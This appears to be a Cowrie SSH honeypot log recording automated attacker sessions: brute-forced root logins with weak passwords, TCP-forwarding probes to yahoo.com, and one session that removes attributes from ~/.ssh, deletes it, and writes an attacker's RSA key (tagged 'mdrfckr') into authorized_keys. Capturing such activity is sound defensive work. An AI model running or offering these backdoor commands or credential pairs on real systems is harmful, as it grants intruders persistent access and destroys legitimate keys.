{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.746478Z","src_ip":"213.209.150.239","session":"2a3c8e944889"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.771511Z","src_ip":"36.89.28.139","session":"9f4b19ea12d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":2450,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:2450","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.881446Z","session":"2a3c8e944889"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.928498Z","src_ip":"213.209.150.239","session":"2a3c8e944889"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:30.976293Z","src_ip":"213.209.150.239","session":"2a3c8e944889"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56410,"dst_ip":"1.2.3.4","dst_port":22,"session":"551097cd3cac","protocol":"ssh","message":"New connection: 213.209.150.239:56410 (1.2.3.4:22) [session: 551097cd3cac]","sensor":"my-vps","timestamp":"2025-08-26T00:56:31.022848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:31.023792Z","src_ip":"213.209.150.239","session":"551097cd3cac"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:31.071332Z","src_ip":"213.209.150.239","session":"551097cd3cac"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:31.305875Z","src_ip":"213.209.150.239","session":"551097cd3cac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":6736,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:6736","sensor":"my-vps","timestamp":"2025-08-26T00:56:31.354551Z","session":"551097cd3cac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:31.401744Z","src_ip":"213.209.150.239","session":"551097cd3cac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":18922,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:18922","sensor":"my-vps","timestamp":"2025-08-26T00:56:31.537524Z","session":"551097cd3cac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:31.584705Z","src_ip":"213.209.150.239","session":"551097cd3cac"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:31.632612Z","src_ip":"213.209.150.239","session":"551097cd3cac"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56459,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f38a0e4ba15","protocol":"ssh","message":"New connection: 213.209.150.239:56459 (1.2.3.4:22) [session: 4f38a0e4ba15]","sensor":"my-vps","timestamp":"2025-08-26T00:56:31.688206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:31.689049Z","src_ip":"213.209.150.239","session":"4f38a0e4ba15"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:31.745473Z","src_ip":"213.209.150.239","session":"4f38a0e4ba15"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.027611Z","src_ip":"213.209.150.239","session":"4f38a0e4ba15"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":24327,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24327","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.085523Z","session":"4f38a0e4ba15"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.142253Z","src_ip":"213.209.150.239","session":"4f38a0e4ba15"}
{"eventid":"cowrie.login.success","username":"root","password":"vps","message":"login attempt [root/vps] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.251074Z","src_ip":"36.89.28.139","session":"9f4b19ea12d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":6112,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:6112","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.299242Z","session":"4f38a0e4ba15"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.356099Z","src_ip":"213.209.150.239","session":"4f38a0e4ba15"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.413369Z","src_ip":"213.209.150.239","session":"4f38a0e4ba15"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56502,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b3ad0a9f932","protocol":"ssh","message":"New connection: 213.209.150.239:56502 (1.2.3.4:22) [session: 1b3ad0a9f932]","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.459605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.460253Z","src_ip":"213.209.150.239","session":"1b3ad0a9f932"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.507748Z","src_ip":"213.209.150.239","session":"1b3ad0a9f932"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:56:32.744521Z","src_ip":"36.89.28.139","session":"9f4b19ea12d5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.745540Z","src_ip":"36.89.28.139","session":"9f4b19ea12d5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.746489Z","src_ip":"36.89.28.139","session":"9f4b19ea12d5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.795112Z","src_ip":"213.209.150.239","session":"1b3ad0a9f932"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":6498,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:6498","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.843261Z","session":"1b3ad0a9f932"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.890681Z","src_ip":"213.209.150.239","session":"1b3ad0a9f932"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:32.957983Z","src_ip":"36.89.28.139","session":"9f4b19ea12d5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":27775,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:27775","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.025773Z","session":"1b3ad0a9f932"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.073254Z","src_ip":"213.209.150.239","session":"1b3ad0a9f932"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":55674,"dst_ip":"1.2.3.4","dst_port":22,"session":"7956d706bd5e","protocol":"ssh","message":"New connection: 27.112.78.170:55674 (1.2.3.4:22) [session: 7956d706bd5e]","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.120425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.121325Z","src_ip":"27.112.78.170","session":"7956d706bd5e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.122411Z","src_ip":"213.209.150.239","session":"1b3ad0a9f932"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":56554,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bc3483d387d","protocol":"ssh","message":"New connection: 213.209.150.239:56554 (1.2.3.4:22) [session: 6bc3483d387d]","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.176619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.177284Z","src_ip":"213.209.150.239","session":"6bc3483d387d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.234084Z","src_ip":"213.209.150.239","session":"6bc3483d387d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:56:33.395265Z","src_ip":"36.89.28.139","session":"9f4b19ea12d5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.395950Z","src_ip":"36.89.28.139","session":"9f4b19ea12d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.398555Z","src_ip":"27.112.78.170","session":"7956d706bd5e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.515993Z","src_ip":"213.209.150.239","session":"6bc3483d387d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":8940,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:8940","sensor":"my-vps","timestamp":"2025-08-26T00:56:33.573561Z","session":"6bc3483d387d"}
